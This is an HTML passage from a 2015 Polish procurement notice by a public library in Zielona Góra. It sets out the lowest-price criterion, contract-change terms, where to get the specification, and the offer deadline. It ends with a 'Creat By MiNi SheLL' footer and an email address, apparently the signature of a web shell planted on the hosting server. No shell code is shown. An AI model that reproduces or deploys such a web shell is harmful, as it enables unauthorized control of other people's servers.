<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych za zgodą obu Stron i pod rygorem nieważności wymaga formy pisemnego aneksu, skutecznego po podpisaniu przez obie Strony.
Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
1.Zmiany wynagrodzenia Wykonawcy w przypadku ustawowej zmiany wysokości stawki podatku VAT. 
2.Odstąpienie od umowy lub jej rozwiązanie może nastąpić tylko i wyłącznie w formie pisemnej wraz ze szczegółowym uzasadnieniem i staje się skuteczne z chwilą jego doręczenia.
3.W przypadku konieczności przesunięcia terminów umownych, jeśli konieczność ta, nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy..:</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wimbp.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka i Miejska Biblioteka Publiczna im. C. Norwida, budynek główny 65-077 Zielona Góra, al. Wojska polskiego 9, Sekretariat II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 12:00, miejsce: Wojewódzka i Miejska Biblioteka Publiczna im. C. Norwida, budynek główny 65-077 Zielona Góra, al. Wojska polskiego 9, Sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com